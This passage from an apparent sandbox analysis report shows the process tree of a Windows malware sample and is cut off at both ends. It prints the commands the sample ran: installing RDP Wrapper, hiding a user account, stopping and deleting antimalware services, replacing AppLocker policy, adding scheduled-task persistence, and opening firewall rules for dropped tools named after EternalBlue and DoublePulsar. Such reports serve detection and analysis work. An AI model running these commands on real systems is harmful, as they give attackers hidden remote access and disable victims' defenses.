                                                                                                                PID:3240
                                                                                                            • C:\rdp\RDPWInst.exe
                                                                                                              "RDPWInst.exe" -i -o
                                                                                                              9⤵
                                                                                                              • Server Software Component: Terminal Services DLL
                                                                                                              • Executes dropped EXE
                                                                                                              • Modifies WinLogon
                                                                                                              • Drops file in System32 directory
                                                                                                              • Drops file in Program Files directory
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:3784
                                                                                                              • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                10⤵
                                                                                                                • Modifies Windows Firewall
                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                PID:4792
                                                                                                            • C:\rdp\RDPWInst.exe
                                                                                                              "RDPWInst.exe" -w
                                                                                                              9⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3076
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                                                                                                              9⤵
                                                                                                              • Hide Artifacts: Hidden Users
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2864
                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                              net accounts /maxpwage:unlimited
                                                                                                              9⤵
                                                                                                                PID:3480
                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                  C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                                                                                  10⤵
                                                                                                                    PID:4856
                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                  attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                                                                                                                  9⤵
                                                                                                                  • Sets file to hidden
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Views/modifies file attributes
                                                                                                                  PID:3368
                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                  attrib +s +h "C:\Program Files\RDP Wrapper"
                                                                                                                  9⤵
                                                                                                                  • Sets file to hidden
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Views/modifies file attributes
                                                                                                                  PID:2664
                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                  attrib +s +h "C:\rdp"
                                                                                                                  9⤵
                                                                                                                  • Sets file to hidden
                                                                                                                  • Views/modifies file attributes
                                                                                                                  PID:3348
                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                              timeout 2
                                                                                                              7⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:5928
                                                                                                      • C:\ProgramData\Microsoft\Intel\winlog.exe
                                                                                                        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4412
                                                                                                        • C:\ProgramData\Microsoft\Intel\winlogon.exe
                                                                                                          "C:\ProgramData\Microsoft\Intel\winlogon.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:6008
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\42F6.tmp\42F7.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
                                                                                                            6⤵
                                                                                                              PID:2324
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                7⤵
                                                                                                                  PID:3748
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
                                                                                                                  7⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:5304
                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                            4⤵
                                                                                                            • Modifies visiblity of hidden/system files in Explorer
                                                                                                            • Executes dropped EXE
                                                                                                            • Adds Run key to start application
                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:5376
                                                                                                            • C:\Programdata\WindowsTask\winlogon.exe
                                                                                                              C:\Programdata\WindowsTask\winlogon.exe
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5944
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                                                                                                                6⤵
                                                                                                                  PID:2904
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    7⤵
                                                                                                                      PID:2976
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /query /fo list
                                                                                                                      7⤵
                                                                                                                        PID:3888
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                                                                    5⤵
                                                                                                                      PID:1216
                                                                                                                      • C:\Windows\system32\ipconfig.exe
                                                                                                                        ipconfig /flushdns
                                                                                                                        6⤵
                                                                                                                        • Gathers network information
                                                                                                                        PID:5764
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                                                                      5⤵
                                                                                                                        PID:3744
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          6⤵
                                                                                                                            PID:6016
                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                            gpupdate /force
                                                                                                                            6⤵
                                                                                                                              PID:4472
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
                                                                                                                          4⤵
                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                          PID:2312
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
                                                                                                                          4⤵
                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                          PID:5716
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
                                                                                                                          4⤵
                                                                                                                          • Drops file in Drivers directory
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:5840
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
                                                                                                                          4⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:5744
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            5⤵
                                                                                                                              PID:5320
                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                              TIMEOUT /T 5 /NOBREAK
                                                                                                                              5⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:952
                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                              TIMEOUT /T 3 /NOBREAK
                                                                                                                              5⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:4788
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              TASKKILL /IM 1.exe /T /F
                                                                                                                              5⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:5104
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              TASKKILL /IM P.exe /T /F
                                                                                                                              5⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4056
                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                              ATTRIB +H +S C:\Programdata\Windows
                                                                                                                              5⤵
                                                                                                                              • Views/modifies file attributes
                                                                                                                              PID:5532
                                                                                                                      • C:\programdata\install\ink.exe
                                                                                                                        C:\programdata\install\ink.exe
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:2692
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c sc start appidsvc
                                                                                                                        2⤵
                                                                                                                          PID:5396
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            sc start appidsvc
                                                                                                                            3⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:2404
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c sc start appmgmt
                                                                                                                          2⤵
                                                                                                                            PID:3512
                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                              sc start appmgmt
                                                                                                                              3⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:2888
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
                                                                                                                            2⤵
                                                                                                                              PID:988
                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                sc config appidsvc start= auto
                                                                                                                                3⤵
                                                                                                                                • Launches sc.exe
                                                                                                                                PID:2896
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
                                                                                                                              2⤵
                                                                                                                                PID:5648
                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                  sc config appmgmt start= auto
                                                                                                                                  3⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:3716
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c sc delete swprv
                                                                                                                                2⤵
                                                                                                                                  PID:788
                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                    sc delete swprv
                                                                                                                                    3⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:940
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c sc stop mbamservice
                                                                                                                                  2⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:3320
                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                    sc stop mbamservice
                                                                                                                                    3⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:4232
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
                                                                                                                                  2⤵
                                                                                                                                    PID:4964
                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                      sc stop bytefenceservice
                                                                                                                                      3⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:4748
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                                                                                                                                    2⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:2928
                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                      sc delete bytefenceservice
                                                                                                                                      3⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:5844
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c sc delete mbamservice
                                                                                                                                    2⤵
                                                                                                                                      PID:200
                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                        sc delete mbamservice
                                                                                                                                        3⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:532
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c sc delete crmsvc
                                                                                                                                      2⤵
                                                                                                                                        PID:2812
                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                          sc delete crmsvc
                                                                                                                                          3⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:668
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c sc delete "windows node"
                                                                                                                                        2⤵
                                                                                                                                          PID:1664
                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                            sc delete "windows node"
                                                                                                                                            3⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:2124
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
                                                                                                                                          2⤵
                                                                                                                                            PID:3472
                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                              sc stop Adobeflashplayer
                                                                                                                                              3⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:3384
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
                                                                                                                                            2⤵
                                                                                                                                              PID:1000
                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                sc delete AdobeFlashPlayer
                                                                                                                                                3⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:2004
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c sc stop MoonTitle
                                                                                                                                              2⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:3064
                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                sc stop MoonTitle
                                                                                                                                                3⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:3724
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
                                                                                                                                              2⤵
                                                                                                                                                PID:2784
                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                  sc delete MoonTitle"
                                                                                                                                                  3⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:3192
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c sc stop AudioServer
                                                                                                                                                2⤵
                                                                                                                                                  PID:2464
                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    sc stop AudioServer
                                                                                                                                                    3⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:4556
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c sc delete AudioServer"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4788
                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                      sc delete AudioServer"
                                                                                                                                                      3⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:5068
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
                                                                                                                                                    2⤵
                                                                                                                                                      PID:744
                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        sc stop clr_optimization_v4.0.30318_64
                                                                                                                                                        3⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:4244
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2936
                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                          sc delete clr_optimization_v4.0.30318_64"
                                                                                                                                                          3⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:4856
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4208
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3136
                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                              sc stop MicrosoftMysql
                                                                                                                                                              3⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:4784
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3460
                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                sc delete MicrosoftMysql
                                                                                                                                                                3⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:4848
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                                                                                                                                                              2⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:5908
                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                netsh advfirewall set allprofiles state on
                                                                                                                                                                3⤵
                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                PID:4808
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5900
                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                  netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                  PID:712
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3932
                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                    PID:3408
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:3748
                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                      netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:3624
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:5764
                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                        PID:2964
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1624
                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                          netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                          PID:1788
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                                                        2⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:1428
                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                          netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                          PID:4988
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3684
                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                            netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                            PID:2740
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                                                          2⤵
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          PID:2692
                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                            netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                            PID:3512
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3640
                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                              netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                              PID:5856
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:460
                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                PID:5648
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5280
                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                  netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                  PID:5976
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:628
                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                    netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                    PID:5800
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5864
                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                      netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:4456
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:3552
                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                        netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                        PID:1280
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2488
                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                          netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:4708
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:4648
                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
